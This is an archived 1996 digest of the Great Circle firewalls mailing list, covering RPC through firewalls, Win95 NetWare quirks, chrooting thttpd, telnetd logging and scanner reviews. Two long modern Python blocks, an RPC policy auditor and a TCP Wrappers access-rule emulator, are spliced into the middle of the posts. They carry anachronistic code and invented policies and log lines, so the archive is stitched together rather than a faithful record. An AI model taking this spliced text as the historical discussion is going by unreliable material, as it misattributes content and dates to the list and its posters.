From firewalls-owner Mon Feb 5 15:38:59 1996
Date: Mon, 5 Feb 1996 17:12:38 -0600
From: "Jim Thompson"
To: Juan Carlos Machado , firewalls@GreatCircle.COM
Subject: Re: CISCO Access Server Configuration
In-Reply-To: Juan Carlos Machado "CISCO Access Server Configuration" (Feb 5, 2:06pm)

use tacacs+.

From firewalls-owner Mon Feb 5 16:08:29 1996
Date: Mon, 5 Feb 96 18:49:44 -0400
From: "Richard L. Snow"
To: "sandy bryant" , "Sick Puppy" , firewalls@GreatCircle.COM
Subject: Re: Need a few pointers

>At 12:40 PM 2/5/96 -0500, Sick Puppy wrote:
>>My hind brain keeps telling my forebrain that somewhere it read that
>>Windows 95 and Windows NT
[]
>>sandy bryant wrote:
>Maybe you're thinking of the problem Novell networks had with Windows 95?
>Since Windows 95 answers the Netware client GetNearestServer call with a
>packet claiming to be a Netware server
[]

My understanding is that Win95 will do this if you set up your workstation to share local printer or disk. The workaround is to make sure locally shared disk/print is turned off in the Network control panel. On a network you can set up a "policy" document which will prevent any user from turning this "feature" on. (Having never done this myself, I parrot the msoft corp line :-)

Regards,
-Rich

Rich Snow rich@aoainc.com (617)864-0201
-----------------------------------------------*
Adaptive Optics Associates, Inc.
54 Cambridgepark Dr., Cambridge, MA. 02140

From firewalls-owner Mon Feb 5 16:12:14 1996
Date: Mon, 5 Feb 96 18:22:59 -0500
From: Frank Willoughby
To: firewalls@GreatCircle.com
Subject: Re: RPC Across a firewall?

Verily, at 12:39 PM 2/5/96, Richard Giering Jr.
allegedly did write:

> I know the kind of reaction I'm liable to get but I said I'd check into it....
>
> We have developers who are writing apps based upon RPC and demanding that RPC
> be opened on the firewall. The idea is to enable users with their own Internet
> provider to be able to access Internal applications using RPC/client-server
> apps.
>
> I have some concerns listed below. Can anyone think of any more?
>
> 1) RPC runs on UDP (right?) and UDP opens a whole other bag of worms
> 2) RPC and portmapper are hard if not impossible to proxy.
> 3) RPC is insecure
> 4) portmapper has many known security holes.
>
> My reaction has been "if they want to dialup, we'll setup internal modems"
>
> Is anyone aware of firewall products that allow and protect RPC?
>
> Rick Giering, Firewall Ranger
> CCH Inc.

Richard,

What your programmers are proposing is essentially *lethal* from a security point-of-view as it opens you to a wide variety of attacks. There are many ways of solving the problem without having to resort to RPCs - even more, since you have the option of coding your own solution (an advantage most of us don't have).

FWIW, I'd recommend three things for your company:

o A security awareness class for your programmers (I strongly suspect that you are only seeing the tip of the iceberg. Taking a look at how existing programs they have written are communicating and handling unexpected exceptions (buffer overflow, etc) probably wouldn't hurt either.)

o A brief security assessment of the network & systems in their group (if they are naive enough about RPCs, there are probably a dozen or so other gaping holes that need to be plugged up)

o A secure network solution which assures that the business unit can meet their objectives - securely. This is the problem they want solved.

I've designed secure networking solutions for a number of companies. Give me a call at the number below & I'll help you as much as I can.
Best Regards,

Frank

The opinions expressed above are of the author and may not necessarily be representative of Fortified Networks Inc.

Fortified Networks Inc. - Management & Information Security Consulting
Phone: (317) 573-0800 - http://www.fortified.com/fortified
Home of the Free Internet Firewall Evaluation Checklist

From firewalls-owner Mon Feb 5 16:23:30 1996
Date: Mon, 5 Feb 1996 18:17:07 -0600
From: Doug Hughes
To: firewalls@greatcircle.com
Subject: Re: RPC Across a firewall?
In-Reply-To: <9602051842.AA5369@notes.cch.com>

> I know the kind of reaction I'm liable to get but I said I'd check into it....
>
> We have developers who are writing apps based upon RPC and demanding that RPC
> be opened on the firewall. The idea is to enable users with their own Internet
> provider to be able to access Internal applications using RPC/client-server
> apps.
>
> I have some concerns listed below. Can anyone think of any more?
>
> 1) RPC runs on UDP (right?) and UDP opens a whole other bag of worms

RPC runs on top of UDP or TCP (and other protocols, but we'll ignore them for now)

> 2) RPC and portmapper are hard if not impossible to proxy.

well, yeah, it can be messy. You have to examine the packet in more detail too to find the RPC service number.
> 3) RPC is insecure

Out of the box, yes, but it can be secured pretty well.

> 4) portmapper has many known security holes.

yeah, but you can get a new version of portmap and/or rpcbind that is tcp/wrappered. This will work as long as:

1) you have source routing blocked at your external router
2) you have IP spoofing blocked at your external router

Versions are available at ftp.win.tue.nl

> My reaction has been "if they want to dialup, we'll setup internal modems"

Well, therein lies a different set of problems. :( (but perhaps a set of problems which you are more equipped to handle)

[ If you reply to this message, do not CC me on the reply. I subscribe to this list, unless it is a private reply, in which case do not CC the list ]

--
____________________________________________________________________________
Doug Hughes                                   Engineering Network Services
System/Net Admin                              Auburn University
doug@eng.auburn.edu
Pro is to Con as progress is to congress

From firewalls-owner Mon Feb 5 17:45:20 1996
From: Jas (Matthew K)
Subject: Re: RPC Across a firewall?
To: frankw@in.net (Frank Willoughby)
Date: Tue, 6 Feb 1996 12:34:59 +1100 (EST)
Cc: firewalls@GreatCircle.COM
In-Reply-To: <9602052322.AA18437@su1.in.net> from "Frank Willoughby" at Feb 5, 96 06:22:59 pm

Frank Willoughby wrote this...

> Richard,
> What your programmers are proposing is essentially *lethal* from a
> security point-of-view as it opens you to a wide variety of attacks.
> There are many ways of solving the problem without having to resort
> to RPCs - even more, since you have the option of coding your own
> solution (an advantage most of us don't have).
> FWIW, I'd recommend three things for your company:
> o A security awareness class for your programmers (I strongly
> suspect that you are only seeing the tip of the iceberg. Taking
> a look at how existing programs they have written are
> communicating and handling unexpected exceptions (buffer
> overflow, etc) probably wouldn't hurt either.)
> o A brief security assessment of the network & systems in their
> group (if they are naive enough about RPCs, there are probably a
> dozen or so other gaping holes that need to be plugged up)
> o A secure network solution which assures that the business unit can
> meet their objectives - securely. This is the problem they want
> solved.
> I've designed secure networking solutions for a number of companies.
> Give me a call at the number below & I'll help you as much as I can.

frank, this is not necessarily true.. RPC can be secured, and quite easily at that _if_ you know what you are doing...
punching it through a firewall can be difficult, but you can get RPC to do things like a) force it to use one and only one port, b) force it to use only TCP, c) turn on authentication, and fold in encryption.

RPC is not the bug bear that most people make it out to be, you just gotta know how to use it properly!!! i have been coding with RPC for almost 2.5 years now, and it _can_ be done, and some things (like authentication) can be done very easily in RPC (far easier than some other methods).

please guys, be sure of what you say before you fire away.

Matt

p.s. i have no qualms in saying that some of the current implementations of RPC servers are insecure (like NFS if not done with SecureNFS or with kerberos)..

--
#!/bin/sh
echo '16i[q]sa[ln0=aln100%Pln100/snlbx]sbA0D3F204445524F42snlbxq'|dc;exit
Matthew Keenan                      Data Network Admin
Information Technology Division     University of Technology Sydney Australia

It's nice to be in a position where people apologize because they assume there's humor in your work, based on past experience, but they're not sure where it is.
-- Rob Pike

From firewalls-owner Mon Feb 5 18:08:56 1996
Date: Mon, 5 Feb 96 18:00:00 PST
From: chris@sandpiper.com (Chris Newton)
To: firewalls@greatcircle.com
Cc: fc@all.net
Subject: problem with thttpd on solaris 2.x

I've been trying to put a secure web server onto a sacrificial lamb in our DMZ, and so decided to use thttpd. Unfortunately, due to circumstances beyond my control, the server is running solaris 2.x (i would have preferred SunOS 4.1.x, but that is a different story).

Anyway, when i run it normally it works just fine. But when i try to run it chroot, it complains in the libsocket library, when trying to access /dev/tcp (which isn't there of course)

I was wondering if the consensus of opinion was to:

a) make a /dev/tcp in the chroot tree;
b) magically acquire a libsocket which doesn't behave this way;
c) give up and don't try to run it chroot.
any help, gratefully received

chris newton
network security
sandpiper software consulting

From firewalls-owner Mon Feb 5 18:24:06 1996
Date: Mon, 5 Feb 1996 21:08:15 -0500 (EST)
From: Rabid Wombat
To: "Richard L. Snow"
Cc: sandy bryant , Sick Puppy , firewalls@GreatCircle.COM
Subject: Re: Need a few pointers

On Mon, 5 Feb 1996, Richard L. Snow wrote:

> >At 12:40 PM 2/5/96 -0500, Sick Puppy wrote:
> >>My hind brain keeps telling my forebrain that somewhere it read that
> >>Windows 95 and Windows NT
> []
> >>sandy bryant wrote:
> >Maybe you're thinking of the problem Novell networks had with Windows 95?
> >Since Windows 95 answers the Netware client GetNearestServer call with a
> >packet claiming to be a Netware server
> []
>
> My understanding is that Win95 will do this if you set up your workstation
> to share local printer or disk. The workaround is to make sure locally shared
> disk/print is turned off in the Network control panel. On a network you can
> set up a "policy" document which will prevent any user from turning this
> "feature" on.

This looks like a work-around, at best. A number of vendors, such as those marketing comm servers and print servers that use IPX/SPX, use SAP to advertise their presence, without responding to a GetNearestServer. Just another Micro$oft "feature". What's the party line on a real fix?
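Back to the RPC thread above (Doug Hughes' advice to run a tcp-wrappered portmapper, and Matthew Keenan's to pin an RPC service to one fixed TCP port): the following is an added example, not code from any poster, that audits an `rpcinfo -p` listing against exactly that "TCP only, one fixed port" policy so an administrator can check the advice was actually applied. The sample listing, the POLICY table, program number 300001 and the 32768 anonymous-port boundary are constructed assumptions.

```python
"""Audit RPC registrations against a "TCP only, one fixed port" policy.

Added example for the RPC thread above; it is not code from any poster.
It parses the table printed by `rpcinfo -p` and reports registrations that
would defeat the advice given there: services still registered over UDP,
services bound to a dynamically assigned (anonymous) port, and services
registered although the policy never allowed them through the firewall.
"""
from collections import Counter
from dataclasses import dataclass

# Constructed sample in the layout `rpcinfo -p` prints (not captured from a
# real host): a header line, then one registration per line.
SAMPLE_RPCINFO = """\
   program vers proto   port  service
    100000    2   tcp    111  portmapper
    100000    2   udp    111  portmapper
    100003    2   udp   2049  nfs
    100003    2   tcp   2049  nfs
    100005    1   udp  32771  mountd
    100005    1   tcp  32771  mountd
    300001    1   tcp   5001  apprpc
    300001    2   tcp  32780  apprpc
"""

# Hypothetical policy: RPC program number -> (required protocol, fixed port).
# 300001 stands in for the in-house application the original poster's
# developers wrote; it is allowed only on TCP and only on the port the
# firewall opens.  Everything else stays blocked.
POLICY = {
    100000: ("tcp", 111),    # portmapper, assumed wrapped with tcp_wrappers
    300001: ("tcp", 5001),   # hypothetical in-house RPC application
}

# Assumption: ports at or above this value came from the kernel's anonymous
# port range (the Solaris 2.x default starts at 32768), i.e. the service let
# the RPC library pick a port instead of binding the fixed one.
ANON_PORT_START = 32768


@dataclass(frozen=True)
class Registration:
    program: int
    version: int
    proto: str
    port: int
    service: str


def parse_rpcinfo(text):
    """Parse `rpcinfo -p` output; the header line and blank lines are skipped."""
    regs = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4 or not fields[0].isdigit():
            continue
        service = fields[4] if len(fields) > 4 else ""
        regs.append(Registration(int(fields[0]), int(fields[1]),
                                 fields[2].lower(), int(fields[3]), service))
    return regs


def audit(regs, policy=POLICY):
    """Return (service name, finding) pairs; an empty list means compliant."""
    findings = []
    seen = set()
    for r in regs:
        name = r.service or str(r.program)
        if r.port >= ANON_PORT_START:
            findings.append((name, "dynamic-port"))     # not pinned to a port
        if r.program not in policy:
            findings.append((name, "not-in-policy"))    # never meant to be reachable
            continue
        seen.add(r.program)
        proto, port = policy[r.program]
        if r.proto != proto:
            findings.append((name, "wrong-proto"))      # e.g. still on UDP
        if r.port != port:
            findings.append((name, "wrong-port"))       # not the port the firewall opens
    # A policy entry with no registration at all is worth knowing too: the
    # firewall hole exists but nothing answers behind it.
    for program in policy:
        if program not in seen:
            findings.append((str(program), "not-registered"))
    return findings


def summarize(findings):
    """Count findings per category, handy for a one-line report."""
    return dict(Counter(code for _, code in findings))


if __name__ == "__main__":
    results = audit(parse_rpcinfo(SAMPLE_RPCINFO))
    for name, code in results:
        print(f"{name:12} {code}")
    print(summarize(results))
```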
From firewalls-owner Mon Feb 5 20:14:07 1996
Date: Mon, 5 Feb 1996 20:08:29 +0000
From: "Alan Olsen"
Organization: Fnord Motor Company
Reply-To: alano@teleport.com
To: gblolmxb@ibmmail.com, rex@cs.su.oz.au
Cc: firewalls@GreatCircle.COM
Subject: Re: www proxies

> Date: Tue, 06 Feb 1996 09:51:53 +1000
> From: rex@staff.cs.su.oz.au (Rex di Bona)
> Subject: www proxies
> To: gblolmxb@ibmmail.com
> Reply-to: rex@cs.su.oz.au
> Cc: firewalls@GreatCircle.COM
>
> Every commercial firewall should support http/ftp/shttp proxies. If they
> don't they'll rapidly lose business. the web is overtaking e-mail
> as the main reason people want to connect to the web.

Most of the problems with using a web browser and/or FTP are from misconfigured software and/or firewalls. With Netscape, if you do not allow connections to port 443, secure connections will not work. I am not certain of any additional port requirements for SHTTP.

There is one place where Netscape has problems with firewalls. Netscape uses passive ftp. Passive mode tries to open a high port and the firewall balks at the connection. (Oddly, Mosaic does not have this problem.)

Netscape 2.0 has an "autoconfigure" for proxies.
I do not have enough information on this to determine if the auto-configure is a security breach in and of itself.

Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
`finger -l alano@teleport.com` for PGP 2.6.2 key
http://www.teleport.com/~alano/
Is the operating system half NT or half full?

From firewalls-owner Mon Feb 5 20:38:32 1996
Date: Mon, 5 Feb 1996 22:52:03 +0000
From: Ian Miller
To: firewalls@greatcircle.com
Subject: Re: Mazama Packet Filter: Misleading advertising

Darren Reed writes:

> * We have used SATAN to analyze MPF installations and verified that
> the above security problems are solved by MPF. The current version
> of MPF can detect port scans from SATAN and automatically block
> all packets from a host running SATAN.

[snip...]

> Maybe they assumed that their DHB (Dynamic Host Blocking) solved everything
> when it blocks out an entire host when it notices a SATAN style attack.

Don't forget the rather spectacular opportunities for denial-of-service attacks such host blocking would offer.
Ian

From firewalls-owner Mon Feb 5 20:53:33 1996
Date: Mon, 5 Feb 1996 23:39:29 -0500 (EST)
From: Chris Woods
To: KM
Cc: firewalls@GreatCircle.COM
Subject: Re: Need a few pointers
In-Reply-To: <9602052109.AA00719@hfsi>

On Mon, 5 Feb 1996, KM wrote:

> There are other operating systems? :)

When did Microsoft buy Wang Fed? ;-)

Chris Woods
Systems Administrator
cjwoods@paladin.com
Paladin Computing Solutions
617-273-4226
http://www.paladin.com/chris/

Want the government to control what you are allowed to read and see? "Why, NO!", you say?
See http://www.eff.org/blueribbon.html From firewalls-owner Tue Feb 6 01:16:17 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id AAA06377 for firewalls-outgoing; Tue, 6 Feb 1996 00:59:35 -0800 (PST) Received: from alcatel.fr (mail.alcatel-alsthom.fr [193.104.30.131]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id AAA06352 for ; Tue, 6 Feb 1996 00:58:51 -0800 (PST) Received: from alcatel.fr (gatekeeper-ssn.alcatel.fr [155.132.180.241]) by mailgate.alcatel.fr (8.7.3/8.7.3) with ESMTP id JAA18269 for ; Tue, 6 Feb 1996 09:58:16 +0100 Received: from AHQP14 (ahqp14.ahqps.alcatel.fr [155.132.120.211]) by nsfhh5.alcatel.fr (8.7.3/8.7.3) with SMTP id JAA25482 for ; Tue, 6 Feb 1996 09:59:07 +0100 (MET) Message-Id: <199602060859.JAA25482@nsfhh5.alcatel.fr> Comments: Authenticated sender is From: "Kare Presttun" Organization: Alcanet International To: Firewalls@GreatCircle.COM Date: Tue, 6 Feb 1996 10:01:56 +0100 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: More SESAME Reply-to: Kare.Presttun@ansf.alcatel.fr X-mailer: Pegasus Mail for Windows (v2.01) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, I'm sorry for posting such a brief message on SESAME. A bit more explanation follows. It is available from: http://www.esat.kuleuven.ac.be/cosic/sesame.html You can regard it as a kind of enhanced Kerberos, that supports a mix of public and secret key cryptography, delegation of rights, separation of the authentication method from the rest of the system, multiple security domains, cross-domain security. It can directly replace Kerberos in DCE. It has an enhanced GSS-API to take advantage of the enhanced services. It is in the public domain (as of today), and Internet drafts are filed to progress it to an RFC. It is an ECMA standard. For more information and source code, check out the above URL. 
I know this list is about firewalls, but I also know that many of you have wider security interests than just firewalls. Regards, Kare ---------------------------------------------------------- | Kare Presttun Alcanet International | | Tel: +33 1 4058 5614 33, rue Emeriau | | Fax: +33 1 4058 5945 F-75015 Paris | | Kare.Presttun@ansf.alcatel.fr FRANCE | From firewalls-owner Tue Feb 6 04:38:35 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA12379 for firewalls-outgoing; Tue, 6 Feb 1996 04:27:25 -0800 (PST) Received: from sarswati.mindware.soft.net (sarswati.mindware.soft.net [164.164.52.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id EAA12374 for ; Tue, 6 Feb 1996 04:27:18 -0800 (PST) Received: from gangotri.mindware.soft.net by sarswati.mindware.soft.net id aa03553; 6 Feb 96 17:54 IST Received: by gangotri.mindware.soft.net with Microsoft Mail id <31180839@gangotri.mindware.soft.net>; Tue, 06 Feb 96 18:02:33 PST From: Prakash N Purushotham To: "'firewalls@greatcircle.com'" Subject: telnetd Date: Tue, 06 Feb 96 17:53:00 PST Message-ID: <31180839@gangotri.mindware.soft.net> X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Is there any way I can configure telnetd to log the client's IP Address, the login id used, time stamps in syslog? 
Prakash prakashp@mindware.soft.net From firewalls-owner Tue Feb 6 06:14:00 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA14000 for firewalls-outgoing; Tue, 6 Feb 1996 05:55:52 -0800 (PST) Received: from gatekeeper.qms.com (gatekeeper.qms.com [161.33.3.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA13995 for ; Tue, 6 Feb 1996 05:55:48 -0800 (PST) Received: from sun470.rd.qms.com (sun470.qms.com) by gatekeeper.qms.com (4.1/SMI-4.1) id AA01799; Tue, 6 Feb 96 07:54:59 CST Received: from joker.rd.qms.com by sun470.rd.qms.com (4.1/SMI-4.1) id AA05945; Tue, 6 Feb 96 07:54:57 CST From: smithj@rd.qms.com (John Smith) Received: by joker.rd.qms.com (4.1) id AA01952; Tue, 6 Feb 96 07:54:56 CST Date: Tue, 6 Feb 96 07:54:56 CST Message-Id: <9602061354.AA01952@joker.rd.qms.com> To: Firewalls@greatcircle.com Subject: Socks and Internet News Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Is there a way to safely tunnel NNTP through SOCKS? Since I'm having to 'experiment' on our running firewall I want to make sure I get it right without opening 10k new holes. Thanks for any advice. 
John Smith john_smith@rd.qms.com From firewalls-owner Tue Feb 6 06:24:27 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA14054 for firewalls-outgoing; Tue, 6 Feb 1996 05:58:41 -0800 (PST) Received: from smtp-gw01.ny.us.ibm.net ([165.87.194.252]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA14049 for ; Tue, 6 Feb 1996 05:58:37 -0800 (PST) From: pcuser@slip133-171.dc.us.ibm.net Received: (from uucp@localhost) by smtp-gw01.ny.us.ibm.net (8.6.9/8.6.9) id NAA41556 for <@smtp-gw01.ny.us.ibm.net:Firewalls@GreatCircle.COM>; Tue, 6 Feb 1996 13:57:47 GMT Message-Id: <199602061357.NAA41556@smtp-gw01.ny.us.ibm.net> Received: from slip133-177.dc.us.ibm.net(129.37.133.177) by smtp-gw01.ny.us.ibm.net via smap (V1.3mjr) id smaOzkDFW; Tue Feb 6 13:57:34 1996 Date: Tue, 6 Feb 96 10:04:23 PST Subject: Firewalls Product Comparison To: @smtp-gw01.ny.us.ibm.net:Firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi guys, I need to prepare a comparative study between Sun's Firewall 1 and IBM NetSP, for the end of this week. Does anyone know where I could find some interesting articles concerning both of these products? Any help would be appreciated. 
Wilmer Caripe EMSCA - ENGINEERING AND MANUFACTURING SYSTEMS CARACAS, VENEZUELA From firewalls-owner Tue Feb 6 06:40:14 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA14807 for firewalls-outgoing; Tue, 6 Feb 1996 06:38:05 -0800 (PST) Received: from protosoft.com ([204.128.207.15]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA14802 for ; Tue, 6 Feb 1996 06:38:01 -0800 (PST) Received: by protosoft.com (4.1/SMI-4.1) id AA10053; Tue, 6 Feb 96 08:36:18 CST Date: Tue, 6 Feb 1996 08:36:17 -0600 (CST) From: Mohammed Ali To: Prakash N Purushotham Cc: "'firewalls@greatcircle.com'" Subject: Re: telnetd In-Reply-To: <31180839@gangotri.mindware.soft.net> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 6 Feb 1996, Prakash N Purushotham wrote: > > Is there any way I can configure telnetd to log the client's > IP Address, the login id used, time stamps in syslog? > How about using TCP Wrappers ! Mohammed Ali. 
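Since TCP Wrappers is the answer given here, an added example (mine, not code from the list or from tcp_wrappers itself) of what tcpd actually does with a connection: it evaluates hosts.allow first (a match admits), then hosts.deny (a match refuses), and admits anything that matches neither, writing one syslog line either way. The policy below is invented; the host names and addresses are borrowed from the message headers for flavour; the client patterns handled are ALL, a leading dot (host-name suffix), a trailing dot (address prefix), net/mask, an exact name or address, and EXCEPT. The log line follows tcpd's "connect from" / "refused connect from" wording with a constructed timestamp, server name and PID. Note that this records the connection, not the login name: that still comes from login(1)'s own wtmp/syslog records.

```python
"""Added example: how TCP Wrappers (tcpd) decides whether to admit a
connection and what it writes to syslog. My illustration of the
hosts_access(5) rules, not code from the list posts or from tcp_wrappers.

Assumptions: a hosts.allow match admits, otherwise a hosts.deny match
refuses, otherwise the connection is admitted; client patterns ALL,
leading dot (host name suffix), trailing dot (address prefix), net/mask,
exact host or address, and EXCEPT. Timestamp, server name and PID in the
log line are constructed; the policy is invented.
"""
import ipaddress


def _match_one(pattern, host, addr):
    if pattern == "ALL":
        return True
    if pattern.startswith("."):            # .mindware.soft.net : host name suffix
        return host.endswith(pattern)
    if pattern.endswith("."):              # 164.164. : address prefix
        return addr.startswith(pattern)
    if "/" in pattern:                     # 164.164.52.0/255.255.255.0 : net/mask
        net, mask = pattern.split("/", 1)
        return ipaddress.ip_address(addr) in ipaddress.ip_network(
            f"{net}/{mask}", strict=False)
    return pattern in (host, addr)         # exact host name or address


def _match_list(spec, host, addr):
    """A client list, optionally 'a b EXCEPT c d'; EXCEPT nests to the right."""
    head, _, tail = spec.partition(" EXCEPT ")
    matched = any(_match_one(p, host, addr) for p in head.split())
    if matched and tail:
        return not _match_list(tail, host, addr)
    return matched


def _rules(text):
    """Parse 'daemon_list : client_list' lines; blanks and # comments are skipped."""
    rules = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            daemons, clients = (s.strip() for s in line.split(":", 1))
            rules.append((daemons.split(), clients))
    return rules


def hosts_access(daemon, host, addr, allow_text, deny_text):
    """True if tcpd would admit `daemon` (its argv[0], e.g. 'in.telnetd') for this client."""
    for daemons, clients in _rules(allow_text):
        if ("ALL" in daemons or daemon in daemons) and _match_list(clients, host, addr):
            return True
    for daemons, clients in _rules(deny_text):
        if ("ALL" in daemons or daemon in daemons) and _match_list(clients, host, addr):
            return False
    return True


def tcpd_log_line(daemon, host, addr, admitted, pid=1234, server="gangotri"):
    """The syslog record tcpd emits for the decision (timestamp, server, PID constructed)."""
    verb = "connect from" if admitted else "refused connect from"
    return f"Feb  6 17:53:00 {server} {daemon}[{pid}]: {verb} {host or addr}"


# Constructed policy: telnet and ftp only from the local domain or subnet,
# minus one untrusted host; everything else is refused by the catch-all.
HOSTS_ALLOW = """
in.telnetd in.ftpd : .mindware.soft.net 164.164.52.0/255.255.255.0 EXCEPT 164.164.52.99
"""
HOSTS_DENY = "ALL : ALL\n"


def demo():
    clients = [("gangotri.mindware.soft.net", "164.164.52.3"),
               ("164.164.52.99", "164.164.52.99"),
               ("miles.greatcircle.com", "198.102.244.35")]
    return [tcpd_log_line("in.telnetd", host, addr,
                          hosts_access("in.telnetd", host, addr, HOSTS_ALLOW, HOSTS_DENY))
            for host, addr in clients]


if __name__ == "__main__":
    print("\n".join(demo()))
```

The catch-all `ALL : ALL` in hosts.deny is the part people forget: without it, a daemon that matches nothing in hosts.allow is still admitted, and the only evidence is the "connect from" line.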
From firewalls-owner Tue Feb 6 06:58:08 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA15224 for firewalls-outgoing; Tue, 6 Feb 1996 06:45:46 -0800 (PST) Received: from iss.net (iss.iss.net [204.241.60.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA15218 for ; Tue, 6 Feb 1996 06:45:42 -0800 (PST) Received: (from cklaus@localhost) by iss.net (8.6.4/8.6.4) id KAA25413 for firewalls@greatcircle.com; Tue, 6 Feb 1996 10:07:39 -0500 From: Christopher Klaus Message-Id: <199602061507.KAA25413@iss.net> Subject: PC Week Article on Network Security Scanners To: firewalls@greatcircle.com Date: Tue, 6 Feb 1996 10:07:38 +1494730 (EST) X-Mailer: ELM [version 2.4 PL20] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Daemons Defy Hackers -------------------- PC Week (Feb 5) has an article comparing all the network security scanners: Internet Scanner 3.2, PingWare 2.01, SATAN, and NetProbe. It does a really good job pointing out the strengths and weaknesses of these products. The online article is at: http://www.zdnet.com/~pcweek/netweek/0205/tdaem.html or http://www.zdnet.com/~pcweek/netweek/netweek.html ISS 1.x and Internet Scanner 3.2 Comparison -------------------------------------------- With CERT recommending and many people using the shareware version of Internet Security Scanner 1.x (ISS), we have put up a whitepaper comparing the commercial and shareware versions. The whitepaper is available at: ftp://ftp.iss.net/pub/iss/issvis.doc ISS Receives Funding -------------------- Internet Security Systems, Inc. has received venture funding from Greylock Management Company and Sigma Partners. Both of these firms have funded early stage Internet technology companies and bring tremendous value to ISS at this stage of our growth. 
This funding provides ISS with the necessary capital to deliver innovative new security products to the Internet marketplace. We have many available engineering positions in our labs for the development of our new products. If you have extensive experience in UNIX and NT system level programming, please contact us at jobs@iss.net -- Christopher William Klaus Voice: (404)252-7270. Fax: (404)252-2427 Internet Security Systems, Inc. "Internet Scanner finds Ste. 115, 5871 Glenridge Dr, Atlanta, GA 30328 your network security holes Web: http://iss.net/ Email: cklaus@iss.net before the hackers do." From firewalls-owner Tue Feb 6 07:24:07 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA15044 for firewalls-outgoing; Tue, 6 Feb 1996 06:41:43 -0800 (PST) Received: from relay2.UU.NET (relay2.UU.NET [192.48.96.7]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id GAA15023 for ; Tue, 6 Feb 1996 06:41:29 -0800 (PST) Received: from kuma.ciens.ucv.ve by relay2.UU.NET with SMTP id QQabti14509; Tue, 6 Feb 1996 09:37:46 -0500 (EST) Received: by kuma.ciens.ucv.ve (1.37.109.4/16.2) id AA06450; Tue, 6 Feb 96 09:37:24 -0430 Date: Tue, 6 Feb 1996 09:37:24 -0430 (SAT) From: Carolina Elortegui To: Firewalls Mailing List Subject: Some Information Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, I just want someone to tell me where I can find information about what every service you can allow or deny in inetd.sec means. I tried the "man" command, but it doesn't help. I tried the manual, but it doesn't help either. Please, would you send me some addresses where I can find information. Thanks. 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Carolina Elortegui Laboratorio de Postgrado Universidad Central de Venezuela Administrador Facultad de Ciencias Escuela de Computacion E-mail: celort@kuma.ciens.ucv.ve ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From firewalls-owner Tue Feb 6 07:58:48 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA18823 for firewalls-outgoing; Tue, 6 Feb 1996 07:43:00 -0800 (PST) Received: from Fe3.rust.net (Fe3.rust.net [204.157.12.254]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id HAA18816 for ; Tue, 6 Feb 1996 07:42:54 -0800 (PST) Received: from dtw-2.rust.net (dtw-2.rust.net [205.199.83.102]) by Fe3.rust.net (8.7.3/8.7.3) with SMTP id KAA18136; Tue, 6 Feb 1996 10:40:05 -0500 (EDT) Date: Tue, 6 Feb 1996 10:40:05 -0500 (EDT) Message-Id: <199602061540.KAA18136@Fe3.rust.net> X-Sender: janken@rust.net X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: "KM" From: "Kenneth J. Stephens" Subject: Re: Survey Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 03:58 PM 2/5/96 -0500, you wrote: SNIP OTHER STUFF------------- >INFOSECURITY NEWS ran its "Shopping for Firewalls" survey in 1995. >Unfortunately, my copy is a reprint, which has no specific issue date on it. >(Magazines that print and distribute these reprints should take heed; it would >be extremely helpful if you'd include the date of the issue in which they were >printed!) If anyone can help, please do. If the magazine publishers forced the issue date onto all of their reprints the vendors would have little use for the reprints. The date stamp would obsolete the reprint so quickly that the vendor would look foolish for distributing old info. One of the hazards of a dynamic industry. 
